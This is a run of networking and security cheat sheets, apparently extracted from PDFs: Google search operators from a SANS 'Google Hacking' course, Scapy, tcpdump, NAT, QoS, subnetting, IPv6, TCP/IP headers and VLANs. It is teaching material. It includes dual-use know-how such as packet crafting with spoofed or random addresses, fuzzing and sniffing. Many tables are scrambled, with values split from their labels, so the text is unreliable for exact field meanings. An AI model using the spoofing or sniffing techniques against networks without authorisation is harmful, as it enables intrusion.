hockey date: 3 (Search for hockey references within past 3 months; 6 and 12-month daterestrict options also available)

plasma television $1000...1500 (Search for plasma televisions between $1000 and $1500)

conference site:www.sans.org (Search SANS site for conference info)

What To Type Into Search Box (& Description of Results)

999999999999

1Z9999W99999999999

Number Searching

FedEx tracking numbers

UPS tracking numbers

Description

Number Searching

insubject:

Various definitions of the word
or phrase

stock:AAPL (Get the stock information for Apple Computer, Inc.)

Advanced Operators

define:

Get information on a stock
abbreviation

fcc B4Z-34009-PIR

n199ua

patent 5123123

202

305214274002

AAAAA999A9AA99999

FAA airplane registration numbers
(An airplane's FAA registration number
is typically printed on its tail)

Patent numbers
(Remember to put the word "patent"
before your patent number)

Telephone area codes

UPC codes

Vehicle Identification Numbers (VIN)

*

-

+

division

multiplication

subtraction

addition

45% of 39

45 / 39

45 * 39

45 – 39

45 + 39

Type Into Search Box

/

percentage of

Meaning

Calculator Operators

% of

raise to a power

2^5
(2 to the 5th power)
^

Operators

FCC equipment IDs
(Remember to put the word "fcc"
before the equipment ID)

9999 9999 9999 9999 9999 99 USPS tracking numbers

stock:

Search Parameters
Description of Use in
Google Search URLs

Operator Examples
Value
The search term

Finds Pages Containing
the search term

If filter is set to 0, show
potentially duplicate results.

Operator Example
q
0 or 1

Search
Parameters

sailboat chesapeake bay

the words sailboat, Chesapeake and
Bay
filter

as_occt

as_filetype

as_ft

i = include
e = exclude

any = anywhere
title = page title
body = text of page
url = in the page URL
links = in links to
the page

a file extension

i = include
e = exclude

a search phrase

The file type is included or
excluded in the search
indicated by as_dt .

The site or domain indicated
by as_sitesearch is included
or excluded in the search.

Find the search term
in the specified location.

The file type is included or
excluded in the search
indicated by as_ft.

The file type indicated by
as_filetype is included or
excluded in the search.

The value submitted is as an
exact phrase. No need to
surround with quotes.

as_epq

either the word sloop or the word yawl

the word virus but NOT the word
computer

sloop OR yawl

virus -computer

This movie title, including the roman
numeral III

the exact phrase to each his own

Star Wars Episode +III

loan info for both the word boat and its
synonyms: canoe, ferry, etc.

“To each his own”

~boat loan

the words Mac and X separated by
exactly one word

definitions of the word sarcastic from
the Web

mac * x

Takes you directly to first web page
returned for your query

define:sarcastic

I’m Feeling Lucky
(Google link)

as_dt

site or domain

Locate pages updated with in
the specified time frame.

as_qdr

as_sitesearch

m3 = three months
m6 = six months
y = past year

Google
Hacking and Defense
Cheat Sheet

POCKET REFERENCE GUIDE

http://www.sans.org

SANS Stay Sharp Program

http://www.sans.org/staysharp

Purpose

This document aims to be a quick reference
outlining all Google operators, their
meaning, and examples of their usage.

What to use this sheet for

Use this sheet as a handy reference that outlines the
various Google searches that you can perform. It is
meant to support you throughout the Google Hacking
and Defense course and can be used as a quick
reference guide and refresher on all Google advanced
operators used in this course. The student could also
use this sheet as guidance in building innovative
operator combinations and new search techniques.

This sheet is split into these sections:
• Operator Examples
• Advanced Operators

• Number Searching
• Calculator Operators
• Search Parameters

References:

http://www.google.com/intl/en/help/refinesearch.html
http://johnny.ihackstuff.com
http://www.google.com/intl/en/help/cheatsheet.html

©SANS Institute 2006

SCAPY

packetlife.net
Basic Commands

Specifying Addresses and Values

ls()

List all available protocols and protocol options

lsc()
List all available scapy command functions

conf

# Explicit IP address (use quotation marks)
>>> IP(dst="192.0.2.1")
# DNS name to be resolved at time of transmission
>>> IP(dst="example.com")

Show/set scapy configuration parameters

# IP network (results in a packet template)
>>> IP(dst="192.0.2.0/24")

Constructing Packets
# Setting protocol fields
>>> ip=IP(src="10.0.0.1")
>>> ip.dst="10.0.0.2"

# Random addresses with RandIP() and RandMAC()
>>> IP(dst=RandIP())
>>> Ether(dst=RandMAC())

# Combining layers
>>> l3=IP()/TCP()
>>> l2=Ether()/l3

# Set a range of numbers to be used (template)
>>> IP(ttl=(1,30))

# Splitting layers apart
>>> l2.getlayer(1)
>> l2.getlayer(2)


# Random numbers with RandInt() and RandLong()
>>> IP(id=RandInt())
|>>

send(pkt, inter=0, loop=0, count=1, iface=N)
Send one or more packets at layer three

Displaying Packets

sendp(pkt, inter=0, loop=0, count=1, iface=N)
Send one or more packets at layer two

# Show an entire packet
>>> (Ether()/IPv6()).show()
###[ Ethernet ]###
dst= ff:ff:ff:ff:ff:ff
src= 00:00:00:00:00:00
type= 0x86dd
###[ IPv6 ]###
version= 6
tc= 0
fl= 0
plen= None
nh= No Next Header
hlim= 64
src= ::1
dst= ::1
# Show field types with
>>> ls(UDP())
sport : ShortEnumField
dport : ShortEnumField
len
: ShortField
chksum : XShortField

sendpfast(pkt, pps=N, mbps=N, loop=0, iface=N)
Send packets much faster at layer two using tcpreplay

>>> send(IP(dst="192.0.2.1")/UDP(dport=53))
.
Sent 1 packets.
>>> sendp(Ether()/IP(dst="192.0.2.1")/UDP(dport=53))
.
Sent 1 packets.
Sending and Receiving Packets
sr(pkt, filter=N, iface=N), srp(…)
Send packets and receive replies

sr1(pkt, inter=0, loop=0, count=1, iface=N), srp1(…)

default values
=
=
=
=

1025
53
None
None

(53)
(53)
(None)
(None)

Fuzzing
# Randomize fields where applicable
>>> fuzz(ICMP()).show()
###[ ICMP ]###
type= 
code= 227
chksum= None
unused= 
by Jeremy Stretch

Sending Packets

Send packets and return only the first reply

srloop(pkt, timeout=N, count=N), srploop(…)
Send packets in a loop and print each reply

>>> srloop(IP(dst="packetlife.net")/ICMP(), count=3)
RECV 1: IP / ICMP 174.143.213.184 > 192.168.1.140
RECV 1: IP / ICMP 174.143.213.184 > 192.168.1.140
RECV 1: IP / ICMP 174.143.213.184 > 192.168.1.140
Sniffing Packets
sniff(count=0, store=1, timeout=N)

Record packets off the wire; returns a list of packets when stopped

# Capture up to 100 packets (or stop with ctrl-c)
>>> pkts=sniff(count=100, iface="eth0")
>>> pkts

v1.0

TCPDUMP

packetlife.net
Command Line Options

-A

Print frame payload in ASCII

-q

Quick output

-c 

Exit after capturing count packets

-r 

Read packets from file

-D

List available interfaces

-s 

Capture up to len bytes per packet

-e

Print link-level headers

-S

Print absolute TCP sequence numbers

-F 

Use file as the filter expression

-t

Don't print timestamps

-G 

Rotate the dump file every n seconds

-v[v[v]]

Print more verbose output

-i 

Specifies the capture interface

-w 

Write captured packets to file

-K

Don't verify TCP checksums

-x

Print frame payload in hex

-L

List data link types for the interface

-X

Print frame payload in hex and ASCII

-n

Don't convert addresses to names

-y 

Specify the data link type

-p

Don't capture in promiscuous mode

-Z 

Drop privileges from root to user

Capture Filter Primitives
[src|dst] host 

Matches a host as the IP source, destination, or either

ether [src|dst] host 

Matches a host as the Ethernet source, destination, or either

gateway host 

Matches packets which used host as a gateway

[src|dst] net /

Matches packets to or from an endpoint residing in network

[tcp|udp] [src|dst] port 

Matches TCP or UDP packets sent to/from port

[tcp|udp] [src|dst] portrange - Matches TCP or UDP packets to/from a port in the given range
less 

Matches packets less than or equal to length

greater 

Matches packets greater than or equal to length

(ether|ip|ip6) proto 

Matches an Ethernet, IPv4, or IPv6 protocol

(ether|ip) broadcast

Matches Ethernet or IPv4 broadcasts

(ether|ip|ip6) multicast

Matches Ethernet, IPv4, or IPv6 multicasts

type (mgt|ctl|data) [subtype ] Matches 802.11 frames based on type and optional subtype
vlan []

Matches 802.1Q frames, optionally with a VLAN ID of vlan

mpls []

Matches MPLS packets, optionally with a label of label

  

Matches packets by an arbitrary expression

Protocols

Modifiers

arp

ip6

slip

ether

link

tcp

fddi

ppp

tr

icmp

radio

udp

ip

rarp

wlan

TCP Flags

! or not
&& or and
|| or or

Examples
udp dst port not 53

UDP not bound for port 53

host 10.0.0.1 && host 10.0.0.2 Traffic between these hosts
tcp dst port 80 or 8080

Packets to either TCP port

ICMP Types
icmp-echoreply

icmp-routeradvert

icmp-tstampreply

icmp-unreach

icmp-routersolicit

icmp-ireq

tcp-urg

tcp-rst

icmp-sourcequench

icmp-timxceed

icmp-ireqreply

tcp-ack

tcp-syn

icmp-redirect

icmp-paramprob

icmp-maskreq

tcp-psh

tcp-fin

icmp-echo

icmp-tstamp

icmp-maskreply

by Jeremy Stretch

v2.0

NETWORK ADDRESS TRANSLATION
Example Topology

packetlife.net

Address Classification
Inside Local

An actual address assigned to
an inside host

An inside address seen from
the outside
An actual address assigned to
Outside Global
an outside host
Inside Global

FastEthernet0
10.0.0.1/16
NAT Inside

FastEthernet1
174.143.212.1/22
NAT Outside

Outside Local

An outside address seen from
the inside

NAT Boundary Configuration

Location

interface FastEthernet0
ip address 10.0.0.1 255.255.0.0
ip nat inside
!
interface FastEthernet1
ip address 174.143.212.1 255.255.252.0
ip nat outside

Perspective
Local

Global

Inside

Inside Local

Inside Global

Outside

Outside Local

Outside Global

Static Source Translation
! One line per static translation
ip nat inside source static 10.0.0.19 192.0.2.1
ip nat inside source static 10.0.1.47 192.0.2.2
ip nat outside source static 174.143.212.133 10.0.0.47
ip nat outside source static 174.143.213.240 10.0.2.181

Dynamic Source Translation
! Create an access list to match inside local addresses
access-list 10 permit 10.0.0.0 0.0.255.255
!
! Create NAT pool of inside global addresses
ip nat pool MyPool 192.0.2.1 192.0.2.254 prefix-length 24
!
! Combine them with a translation rule
ip nat inside source list 10 pool MyPool
!
! Dynamic translations can be combined with static entries
ip nat inside source static 10.0.0.42 192.0.2.42

Terminology
NAT Pool
A pool of IP addresses to be used as inside
global or outside local addresses in translations

Port Address Translation (PAT)
An extension to NAT that translates information
at layer four and above, such as TCP and UDP
port numbers; dynamic PAT configurations
include the overload keyword

Extendable Translation

The extendable keyword must be appended
when multiple overlapping static translations are
configured

Special NAT Pool Types
Rotary Used for load balancing
Match- Preserves the host portion of
Host the address after translation

Port Address Translation (PAT)
! Static layer four port translations
ip nat inside source static tcp 10.0.0.3 8080 192.0.2.1 80
ip nat inside source static udp 10.0.0.14 53 192.0.2.2 53
ip nat outside source static tcp 174.143.212.4 23 10.0.0.8 23
!
! Dynamic port translation with a pool
ip nat inside source list 11 pool MyPool overload
!
! Dynamic translation with interface overloading
ip nat inside source list 11 interface FastEthernet1 overload

Troubleshooting
show ip nat translations [verbose]
show ip nat statistics
clear ip nat translations
NAT Translations Tuning
ip nat translation tcp-timeout 
ip nat translation udp-timeout 
ip nat translation max-entries 

Inside Destination Translation
! Create a rotary NAT pool
ip nat pool LoadBalServers 10.0.99.200 10.0.99.203 prefix-length 24 type rotary
!
! Enable load balancing across inside hosts for incoming traffic
ip nat inside destination list 12 pool LoadBalServers

by Jeremy Stretch

v1.0

QUALITY

OF

SERVICE · PART 1

Quality of Service Models

packetlife.net
IP Type of Service (TOS)

Best Effort · No QoS policies are implemented
Integrated Services (IntServ)
Resource Reservation Protocol (RSVP) is used to reserve bandwidth perflow across all nodes in a path
Differentiated Services (DiffServ)
Packets are individually classified and marked; policy decisions are made
independently by each node in a path

Precedence
Ver

HL

TOS

Len

DSCP

Precedence/DSCP

Layer 2 QoS Markings

DSCP

Prec.

56 111000

Reserved

7

Frame Relay Discard Eligibility (DE) 1-bit drop eligibility flag

48 110000

Reserved

6

ATM Cell Loss Priority (CLP) 1-bit drop eligibility flag

46 101110

EF

5

32 100000

CS4

34 100010

AF41

36 100100

AF42

38 100110

AF43

24 011000

CS3

26 011010

AF31

28 011100

AF32

30 011110

AF33

16 010000

CS2

18 010010

AF21

20 010100

AF22

22 010110

AF23

Medium Name

Binary

Type

Ethernet Class of Service (CoS) 3-bit 802.1p field in 802.1Q header

MPLS Traffic Class (TC)

3-bit field compatible with 802.1p

IP QoS Markings
IP Precedence
The first three bits of the IP TOS field; limited to 8 traffic classes
Differentiated Services Code Point (DSCP)
The first six bits of the IP TOS are evaluated to provide more granular
classification; backward-compatible with IP Precedence
QoS Flowchart
No
HW
Queue
Full?

Yes

Queuing
Decision

Software Queue
Software Queue

Scheduler

Software Queue

Hardware
Queue

8 001000
Terminology
Per-Hop Behavior (PHB)
The individual QoS action performed at each independent DiffServ node
Trust Boundary · Beyond this, inbound QoS markings are not trusted
Tail Drop · Occurs when a packet is dropped because a queue is full
Policing
Imposes an artificial ceiling on the amount of bandwidth that may be
consumed; traffic exceeding the policer rate is reclassified or dropped
Shaping
Similar to policing but buffers excess traffic for delayed transmission;
makes more efficient use of bandwidth but introduces a delay
TCP Synchronization
Flows adjust TCP window sizes in synch, making inefficient use of a link
DSCP Per-Hop Behaviors
Class Selector (CS) · Backward-compatible with IP Precedence values
Assured Forwarding (AF) · Four classes with variable drop preferences
Expedited Forwarding (EF) · Priority queuing for delay-sensitive traffic
by Jeremy Stretch

3

2

CS1

10 001010

AF11

12 001100

AF12

14 001110

AF13

0 000000

4

BE

1

0

Congestion Avoidance
Random Early Detection (RED)
Packets are randomly dropped
before a queue is full to prevent tail
drop; mitigates TCP
synchronization
Weighted RED (WRED)
RED with the added capability of
recognizing prioritized traffic based
on its marking
Class-Based WRED (CBWRED)
WRED employed inside a classbased WFQ (CBWFQ) queue
v2.0

QUALITY

SERVICE · PART 2

OF

packetlife.net

Queuing Comparison
FIFO

PQ

CQ

WFQ

CBWFQ

LLQ

No

No

<=2 Mbps

No

No

4

Configured

Dynamic

Configured

Configured

Configurable Classes No

Yes

Yes

No

Yes

Yes

Bandwidth Allocation Automatic

Automatic

Configured

Automatic

Configured

Configured

Yes

No

No

No

Yes

No

No

No

Yes

Yes

Default on Interfaces >2 Mbps
Number of Queues 1

Provides for Minimal Delay No
Modern Implementation Yes
First In First Out (FIFO)

Priority Queuing (PQ)

LLQ Config Example
Class Definitions

High

Tx
Ring

Medium
Normal

Hardware
Queue

Hardware Queue

· Packets are transmitted in the
order they are processed
· No prioritization is provided
· Default queuing method on highspeed (>2 Mbps) interfaces
· Configurable with the tx-ringlimit interface config command
Custom Queuing (CQ)
Queue A

500 B/cycle

Queue B

4500 B/cycle

Queue C

1500 B/cycle

Low

· Provides four static queues which
cannot be reconfigured
· Higher-priority queues are
always emptied before lowerpriority queues
· Lower-priority queues are at risk
of bandwidth starvation
Weighted Fair Queuing (WFQ)
Flow 1

Hardware
Queue

· Rotates through queues using
Weighted Round Robin (WRR)
· Processes a configurable number
of bytes from each queue per turn
· Prevents queue starvation but
does not provide for delaysensitive traffic
Class-Based WFQ (CBWFQ)
Queue A

512 Kbps Min

Queue B

1024 Kbps Min

Default

Remainder

Hardware
Queue

· WFQ with administratively
configured queues

Flow 2

...
Flow n

Hardware
Queue

· Queues are dynamically created
per flow to ensure fair processing
· Statistically drops packets from
aggressive flows more often
· No support for delay-sensitive
traffic
Low Latency Queuing (LLQ)
Priority

512 Kbps Max

Queue A

512 Kbps Min

Queue B

1024 Kbps Min

Default

Remainder

Policy Creation
policy-map Foo
class Voice
! Priority queue policed to 33%
priority percent 33
class Call-Signaling
! Allocate 5% of bandwidth
bandwidth percent 5
class Critical-Apps
bandwidth percent 20
! Extend queue size to 96 packets
queue-limit 96
class Scavenger
! Police to 64 kbps
police cir 64000
conform-action transmit
exceed-action drop
class class-default
! Enable WFQ
fair-queue
! Enable WRED
random-detect
Policy Application
interface Serial0
! Apply the policy in or out
service-policy output Foo

Hardware
Queue

· Each queue is allocated an
amount/percentage of bandwidth

· CBWFQ with the addition of a
policed strict-priority queue

· No support for delay-sensitive
traffic

· Highly configurable while still
supporting delay-sensitive traffic

by Jeremy Stretch

! Match packets by DSCP value
class-map match-all Voice
match dscp ef
!
class-map match-all Call-Signaling
match dscp cs3
!
class-map match-any Critical-Apps
match dscp af21 af22
!
! Match packets by access list
class-map match-all Scavenger
match access-group name Other

LLQ Config Example
show policy-map [interface]
Show interface
show queue 
Show mls qos
v2.0

IPV4 SUBNETTING

packetlife.net

Subnets

Decimal to Binary

CIDR Subnet Mask

Addresses

Wildcard

Subnet Mask

Wildcard

/32 255.255.255.255

1

0.0.0.0

255 1111 1111

0 0000 0000

/31 255.255.255.254

2

0.0.0.1

254 1111 1110

1 0000 0001

/30 255.255.255.252

4

0.0.0.3

252 1111 1100

3 0000 0011

/29 255.255.255.248

8

0.0.0.7

248 1111 1000

7 0000 0111

/28 255.255.255.240

16

0.0.0.15

240 1111 0000

15 0000 1111

/27 255.255.255.224

32

0.0.0.31

224 1110 0000

31 0001 1111

/26 255.255.255.192

64

0.0.0.63

192 1100 0000

63 0011 1111

/25 255.255.255.128

128

0.0.0.127

128 1000 0000

127 0111 1111

/24 255.255.255.0

256

0.0.0.255

0 0000 0000

255 1111 1111

/23 255.255.254.0

512

0.0.1.255

/22 255.255.252.0

1,024

0.0.3.255

/21 255.255.248.0

2,048

0.0.7.255

/20 255.255.240.0

4,096

0.0.15.255

/19 255.255.224.0

8,192

0.0.31.255

/18 255.255.192.0

16,384

0.0.63.255

/17 255.255.128.0

32,768

0.0.127.255

/16 255.255.0.0

65,536

0.0.255.255

/15 255.254.0.0

131,072

0.1.255.255

/14 255.252.0.0

262,144

0.3.255.255

/13 255.248.0.0

524,288

0.7.255.255

/12 255.240.0.0

1,048,576

0.15.255.255

/11 255.224.0.0

2,097,152

0.31.255.255

/10 255.192.0.0

4,194,304

0.63.255.255

/9 255.128.0.0

8,388,608

0.127.255.255

A 0.0.0.0 – 127.255.255.255

/8 255.0.0.0

16,777,216

0.255.255.255

B 128.0.0.0 - 191.255.255.255

/7 254.0.0.0

33,554,432

1.255.255.255

C 192.0.0.0 - 223.255.255.255

/6 252.0.0.0

67,108,864

3.255.255.255

D 224.0.0.0 - 239.255.255.255

/5 248.0.0.0

134,217,728

7.255.255.255

E 240.0.0.0 - 255.255.255.255

/4 240.0.0.0

268,435,456

15.255.255.255

/3 224.0.0.0

536,870,912

31.255.255.255

RFC 1918 10.0.0.0 - 10.255.255.255

/2 192.0.0.0

1,073,741,824

63.255.255.255

Localhost 127.0.0.0 - 127.255.255.255

/1 128.0.0.0

2,147,483,648

127.255.255.255

RFC 1918 172.16.0.0 - 172.31.255.255

/0 0.0.0.0

4,294,967,296

255.255.255.255

RFC 1918 192.168.0.0 - 192.168.255.255

Subnet Proportion

/27

/26

/28

/29
/30
/30

/25

Classful Ranges

Reserved Ranges

Terminology
CIDR
Classless interdomain routing was developed to
provide more granularity than legacy classful
addressing; CIDR notation is expressed as /XX
by Jeremy Stretch

VLSM
Variable-length subnet masks are an arbitrary length
between 0 and 32 bits; CIDR relies on VLSMs to define
routes
v2.0

IPV6

packetlife.net
Protocol Header
8

Ver

16

Address Notation
24

Traffic Class

32

Flow Label

Payload Length

Next Header

Hop Limit

· Eliminate leading zeros from all two-byte sets
· Replace up to one string of consecutive zeros
with a double-colon (::)
Address Formats

Source Address

Global unicast
Global Prefix

Subnet

Interface ID

48

16

64

Destination Address

Link-local unicast
Version (4 bits) · Always set to 6

Interface ID

Traffic Class (8 bits) · A DSCP value for QoS

Next Header (8 bits) · Header or protocol which follows
Hop Limit (8 bits) · Similar to IPv4's time to live field

8

Group ID

4 4

112

EUI-64 Formation

Source Address (128 bits) · Source IP address
Destination Address (128 bits) · Destination IP address

64

Multicast
Flags

Payload Length (16 bits) · Length of the payload in bytes

64

Scope

Flow Label (20 bits) · Identifies unique flows (optional)

MAC

Address Types
EUI-64

Unicast · One-to-one communication
Multicast · One-to-many communication

· Insert 0xfffe between the two halves of the MAC

Anycast · An address configured in multiple locations

· Flip the seventh bit (universal/local flag) to 1

Multicast Scopes
1 Interface-local

5 Site-local

2 Link-local

8 Org-local

4 Admin-local

E Global

Special-Use Ranges

Extension Headers
Hop-by-hop Options (0)
Carries additional information which must be examined by every
router in the path
Routing (43)
Provides source routing functionality

::/0

Default route

Fragment (44)
Included when a packet has been fragmented by its source

::/128

Unspecified

::1/128

Loopback

Encapsulating Security Payload (50)
Provides payload encryption (IPsec)

::/96

IPv4-compatible*

Authentication Header (51)
Provides packet authentication (IPsec)

::FFFF:0:0/96

IPv4-mapped

2001::/32

Teredo

Destination Options (60)
Carries additional information which pertains only to the recipient

2001:DB8::/32

Documentation

2002::/16

6to4

FC00::/7

Unique local

FE80::/10

Link-local unicast

FEC0::/10

Site-local unicast*

FF00::/8

Multicast

by Jeremy Stretch

Transition Mechanisms
Dual Stack
Transporting IPv4 and IPv6 across an infrastructure simultaneously
Tunneling
IPv6 traffic is encapsulated into IPv4 using IPv6-in-IP, UDP (Teredo),
or Intra-Site Automatic Tunnel Addressing Protocol (ISATAP)

Translation
Stateless IP/ICMP Translation (SIIT) translates IP header fields, NAT
* Deprecated Protocol Translation (NAT-PT) maps between IPv6 and IPv4 addresses
v2.0

UDP Header

Checksum

Destination Port

Bit Number
1111111111222222222233
01234567890123456789012345678901
Length

Source Port

UDP Header Information
Common UDP Well-Known Server Ports
7 echo
138 netbios-dgm
19 chargen
161 snmp
37 time
162 snmp-trap
53 domain
500 isakmp
67 bootps (DHCP)
514 syslog
68 bootpc (DHCP)
520 rip
69 tftp
33434 traceroute
137 netbios-ns
Length
(Number of bytes in entire datagram including header;
minimum value = 8)
Checksum
(Covers pseudo-header and entire UDP datagram)

ARP

Protocol Address Type

Bit Number
1111111111222222222233
01234567890123456789012345678901
Hardware Address Type
Operation

Source Protocol Address

Source Hardware Address

Prot. Addr Len

Target Hardware Address

H/w Addr Len

Source Protocol Addr (cont.)

Source Hardware Addr (cont.)

Target Hardware Address (cont.)
Target Protocol Address

ARP Parameters (for Ethernet and IPv4)
Hardware Address Type
1 Ethernet
6 IEEE 802 LAN
Protocol Address Type
2048 IPv4 (0x0800)
Hardware Address Length
6 for Ethernet/IEEE 802
Protocol Address Length
4 for IPv4
Operation
1 Request
2 Reply

The SANS Technology Institute (STI)
offers two degree programs:
MS in Information Security Management
and
MS in Information Security Engineering.
If you have a bachelor’s degree and 12 months
of experience in information security, follow
these easy steps to get started:
• Complete an application – downloadable at
www.sans.edu/admissions/procedure.php
• Submit the employer recommendation – form is
provided
• Have your college send sealed transcripts to STI
• Submit an application fee

Learn more at www.sans.edu
Contact us at
info@sans.edu or (720) 941-4932

Version July-2010

TCP/IP and tcpdump

•

www.sans.org

• http://isc.sans.org

POCKET REFERENCE GUIDE
ISC@sans.org

C O U R S E S & G I A C C E R T I F I C AT I O N S

FOR558

Network Forensics
MGT512

GSLC

SANS Security Leadership Essentials For
Managers with Knowledge Compression™
SEC401
GSEC

SANS Security Essentials Bootcamp Style
SEC502
GCFW

Perimeter Protection In-Depth
SEC503
GCIA

Intrusion Detection In-Depth
SEC556

Comprehensive Packet Analysis
SEC560

Network Penetration Testing & Ethical Hacking
GPEN

tcpdump Usage

Display data link header.
Filter expression in file.
Listen on int interface.
Don't resolve IP addresses.
Read packets from file.
Get snaplen bytes from each packet.
Use absolute TCP sequence numbers.
Don't print timestamp.
Verbose mode.
Write packets to file.
Display in hex.
Display in hex and ASCII.

tcpdump [-aenStvx] [-F file]
[-i int] [-r file] [-s snaplen]
[-w file] ['filter_expression']

-e
-F
-i
-n
-r
-s
-S
-t
-v
-w
-x
-X

Acronyms

All RFCs can be found at http://www.rfc-editor.org

0

QR

1

2

3

Opcode

Query/Response
0 Query
1 Response

4

5

DNS

7

8

Bit Number
6
ID.

9

LENGTH (TCP ONLY)

AA TC RD RA
QDCOUNT
ANCOUNT
NSCOUNT
ARCOUNT

Answer Section

Question Section

Authority Section

1
0

Z

DNS Parameters

Additional Information Section

(Reserved; set to 0)

(1 = Recursion Available)

(1 = Recursion Desired)

(1 = TrunCation)

(1 = Authoritative Answer)

Opcode
0 Standard query (QUERY)
1 Inverse query (IQUERY)
2 Server status request (STATUS)
AA
TC
RD
RA
Z
Response code
0 No error
1 Format error
2 Server failure
3 Non-existant domain (NXDOMAIN)
4 Query type not implemented
5 Query refused

1
1

QDCOUNT
(No. of entries in Question section)
ANCOUNT
(No. of resource records in Answer section)

1
2

1
3

1
4

RCODE

1
5

NSCOUNT
(No. of name server resource records in Authority section)
ARCOUNT
(No. of resource records in Additional Information section.

Protocol

Fragment Offset

Total Length

Header Checksum

IP Header Contents

Options (optional)

Destination Address

Source Address

Flags

17
47
50
51

UDP
GRE
ESP
AH

Differentiated Services
000
0
0
0
1 = ECN capable
1 = congestion experienced

57
88
89
115

SKIP
EIGRP
OSPF
L2TP

RFC 1918 PRIVATE ADDRESSES
A
10.0.0.0-10.255.255.255
B
172.16.0.0-172.31.255.255
C
192.168.0.0-192.168.255.255
D (multicast)
E (experimental)

(1
(1
(1
(1
(1

=
=
=
=
=

Destination Port

Sequence Number

Window

Urgent Pointer

Acknowledgment Number

Flags

Options (optional)

Options
0 End of Options list
1 No operation (pad)
2 Maximum segment size

pop3
sunrpc
nntp
netbios-ssn
imap
bgp
ldap
https (ssl)
microsoft-ds
socks

3 Window scale
4 Selective ACK ok
8 Timestamp

Urgent Pointer
Offset pointer to urgent data

Checksum
Covers pseudoheader and entire TCP segment

A
P
R
S
F

U (1 = Consult urgent pointer, notify server application
of urgent data)
Consult acknowledgement field)
Push data)
Reset connection)
Synchronize sequence numbers)
no more data; Finish connection)

ECN bits (used when ECN employed; else 00)
CWR (1 = sender has cut congestion window in half)
ECN-Echo (1 = receiver cuts congestion window in half)

Flags (CEUAPRSF)

Reserved
4 bits; set to 0

Offset
Number of 32-bit words in TCP header; minimum value = 5

Common TCP Well-Known Server Ports
7 echo
110
19 chargen
111
20 ftp-data
119
21 ftp-control
139
22 ssh
143
23 telnet
179
25 smtp
389
53 domain
443
79 finger
445
80 http
1080

TCP Header Contents

Checksum

Offset Reserved

Source Port

TCP Header

Type of Service

IP Header

Class
Class
Class
Class
Class

Network value; broadcast (old)
Broadcast

Options (0-40 bytes; padded to 4-byte boundary)
0 End of Options list
68 Timestamp
1 No operation (pad)
131 Loose source route
7 Record route
137 Strict source route

Addressing
NET_ID
0-127
128-191
192-223
224-239
240-255
HOST_ID
0
255

Header Checksum
Covers IP header only

Protocol
1 ICMP
2 IGMP
6 TCP
9 IGRP

Fragment Offset
Position of this fragment in the original datagram,
in units of 8 bytes

Flags (xDM)
x (reserved and set to 0)
D (1 = Don't Fragment)
M (1 = More Fragments)

Total Length
Number of bytes in packet; maximum length = 65,535

Type of Service (PreDTRCx)
-->
Precedence (000-111)
D (1 = minimize delay)
T (1 = maximize throughout)
R (1 = maximize reliability)
C (1 = minimize cost)
x (reserved and set to 0)

Internet Header Length
Number of 32-bit words in IP header; minimum
value = 5 (20 bytes) & maximum value = 15 (60 bytes)

Version
4 IP version 4

Time to Live

Identification

IHL

ICMP

Checksum

Version

Bit Number
1111111111222222222233
01234567890123456789012345678901

Checksum

Bit Number
1111111111222222222233
01234567890123456789012345678901

Code
Other message-specific information...

Code (0)

Sequence Number

(Header Length)

Bit Number
1111111111222222222233
01234567890123456789012345678901
Type

PING (Echo/Echo Reply)

Echo Reply
Destination Unreachable
0 Net Unreachable
1 Host Unreachable
2 Protocol Unreachable
3 Port Unreachable
4 Fragmentation Needed & DF Set
5 Source Route Failed
6 Destination Network Unknown
7 Destination Host Unknown
8 Source Host Isolated
9 Network Administratively Prohibited
10 Host Administratively Prohibited
11 Network Unreachable for TOS
12 Host Unreachable for TOS
13 Communication Administratively Prohibited
Source Quench
Redirect
0 Redirect Datagram for the Network
1 Redirect Datagram for the Host
2 Redirect Datagram for the TOS & Network
3 Redirect Datagram for the TOS & Host
Echo
Router Advertisement
Router Selection
Time Exceeded
0 Time to Live exceeded in Transit
1 Fragment Reassembly Time Exceeded
Parameter Problem
0 Pointer indicates the error
1 Missing a Required Option
2 Bad Length
Timestamp
Timestamp Reply
Information Request
Information Reply
Address Mask Request
Address Mask Reply
Traceroute

Type Name/Codes (Code=0 unless otherwise specified)
0
3

4
5

8
9
10
11
12

13
14
15
16
17
18
30

Type (8 or 0)

Data...

Bit Number
1111111111222222222233
01234567890123456789012345678901
Identifier

VLANS

packetlife.net
Trunk Encapsulation

ISL

Trunk Types

26

6

6

2

4

ISL
Header

Dest
MAC

Source
MAC

Type

FCS

Dest
MAC

Source
MAC

Type

Untagged
802.1Q

802.1Q

Header Size 4 bytes

Dest
MAC

Source
MAC

802.1Q

Type

6

6

4

2

Switch(config)# vlan 100
Switch(config-vlan)# name Engineering

mode access
nonegotiate
access vlan 100
voice vlan 150

Trunk Port Configuration
Switch(config-if)#
Switch(config-if)#
Switch(config-if)#
Switch(config-if)#

switchport
switchport
switchport
switchport

mode trunk
trunk encapsulation dot1q
trunk allowed vlan 10,20-30
trunk native vlan 10

SVI Configuration
Switch(config)# interface vlan100
Switch(config-if)# ip address 192.168.100.1 255.255.255.0

VLAN Trunking Protocol (VTP)
Domain
Common to all switches participating in VTP
Server Mode
Generates and propagates VTP advertisements to clients;
default mode on unconfigured switches
Client Mode
Receives and forwards advertisements from servers; VLANs
cannot be manually configured on switches in client mode
Transparent Mode
Forwards advertisements but does not participate in VTP;
VLANs must be configured manually
Pruning
VLANs not having any access ports on an end switch are
removed from the trunk to reduce flooded traffic
VTP Configuration
Switch(config)#
Switch(config)#
Switch(config)#
Switch(config)#
Switch(config)#

vtp
vtp
vtp
vtp
vtp

by Jeremy Stretch

mode {server | client | transparent}
domain 
password 
version {1 | 2}
pruning

4 bytes

Standard IEEE

Cisco

Maximum VLANs 4094

1000

VLAN Numbers
0 Reserved

1004 fdnet

1 default

1005 trnet

1002 fddi-default

1006-4094 Extended

1003 tr

Access Port Configuration
switchport
switchport
switchport
switchport

26 bytes

Trailer Size N/A

VLAN Creation

Switch(config-if)#
Switch(config-if)#
Switch(config-if)#
Switch(config-if)#

ISL

4095 Reserved
Terminology

Trunking
Carrying multiple VLANs over the same
physical connection
Native VLAN
By default, frames in this VLAN are untagged
when sent across a trunk
Access VLAN
The VLAN to which an access port is assigned
Voice VLAN
If configured, enables minimal trunking to
support voice traffic in addition to data traffic
on an access port
Dynamic Trunking Protocol (DTP)
Can be used to automatically establish trunks
between capable ports (insecure)
Switched Virtual Interface (SVI)
A virtual interface which provides a routed
gateway into and out of a VLAN
Switch Port Modes
trunk
Forms an unconditional trunk
dynamic desirable
Attempts to negotiate a trunk with the far end
dynamic auto
